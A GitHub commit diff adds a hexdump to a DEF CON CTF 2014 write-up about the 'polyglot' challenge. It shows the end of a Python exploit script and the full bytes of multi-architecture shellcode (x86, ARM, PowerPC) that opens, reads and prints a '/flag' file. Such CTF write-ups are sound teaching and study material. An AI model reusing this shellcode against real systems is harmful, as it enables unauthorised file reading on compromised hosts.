Skip to content

Commit 2a45fa9

Browse files
author
Andrew Buss
committed
Added hexdump to polyglot writeup
1 parent 717a36d commit 2a45fa9

File tree

1 file changed

+33
-0
lines changed

1 file changed

+33
-0
lines changed

Diff for: _posts/2014-05-18-defcon-ctf-2014-writeups.md

+33
Original file line numberDiff line numberDiff line change
@@ -248,3 +248,36 @@ We used a Python script to handle the assembly of the combined binary and the in
248248
sys.stdout.write(con.read_one(15))
249249

250250
test_live()
251+
252+
The resulting assembled shellcode looks like:
253+
254+
00000000 73 12 00 00 48 00 01 70 9a 00 00 40 13 00 00 ea |s...H..p...@....|
255+
00000010 90 90 90 90 31 c0 31 db 31 c9 31 d2 eb 32 5b b0 |....1.1.1.1..2[.|
256+
00000020 05 31 c9 cd 80 89 c6 eb 06 b0 01 31 db cd 80 89 |.1.........1....|
257+
00000030 f3 b0 03 83 ec 01 8d 0c 24 b2 01 cd 80 31 db 39 |........$....1.9|
258+
00000040 c3 74 e6 b0 04 b3 01 b2 01 cd 80 83 c4 01 eb df |.t..............|
259+
00000050 e8 c9 ff ff ff 2f 66 6c 61 67 00 00 58 58 58 58 |...../flag..XXXX|
260+
00000060 40 00 8f e2 05 70 a0 e3 00 10 a0 e3 00 00 00 ef |@....p..........|
261+
00000070 00 00 a0 e1 03 70 a0 e3 16 3a a0 e3 03 10 a0 e1 |.....p...:......|
262+
00000080 01 2a a0 e3 00 00 00 ef 00 20 a0 e1 04 70 a0 e3 |.*....... ...p..|
263+
00000090 01 00 a0 e3 03 10 a0 e1 00 00 00 ef 01 70 a0 e3 |.............p..|
264+
000000a0 00 00 a0 e3 00 00 00 ef 2f 66 6c 61 67 00 00 00 |......../flag...|
265+
000000b0 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 |XXXXXXXXXXXXXXXX|
266+
*
267+
00000110 e2 8f 00 40 e3 a0 70 05 e3 a0 10 00 ef 00 00 00 |[email protected].........|
268+
00000120 e1 a0 00 00 e3 a0 70 03 e3 a0 3a 16 e1 a0 10 03 |......p...:.....|
269+
00000130 e3 a0 2a 01 ef 00 00 00 e1 a0 20 00 e3 a0 70 04 |..*....... ...p.|
270+
00000140 e3 a0 00 01 e1 a0 10 03 ef 00 00 00 e3 a0 70 01 |..............p.|
271+
00000150 e3 a0 00 00 ef 00 00 00 2f 66 6c 61 67 00 00 00 |......../flag...|
272+
00000160 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 |XXXXXXXXXXXXXXXX|
273+
00000170 58 58 58 58 38 00 00 05 38 60 00 41 54 63 c0 0e |XXXX8...8`.ATc..|
274+
00000180 38 63 01 dc 38 80 00 00 38 a0 00 00 44 00 00 02 |8c..8...8...D...|
275+
00000190 60 00 00 00 38 00 00 03 38 60 00 03 38 80 10 01 |`...8...8`..8...|
276+
000001a0 54 84 80 1e 60 84 5a 74 38 a0 08 00 44 00 00 02 |T...`.Zt8...D...|
277+
000001b0 60 00 00 00 7c 65 1b 78 38 00 00 04 38 60 00 01 |`...|e.x8...8`..|
278+
000001c0 38 80 10 01 54 84 80 1e 60 84 5a 74 44 00 00 02 |8...T...`.ZtD...|
279+
000001d0 38 00 00 01 38 60 00 00 44 00 00 02 2f 66 6c 61 |8...8`..D.../fla|
280+
000001e0 67 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 |g.XXXXXXXXXXXXXX|
281+
000001f0 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 |XXXXXXXXXXXXXXXX|
282+
*
283+
00000400

0 commit comments

Comments
 (0)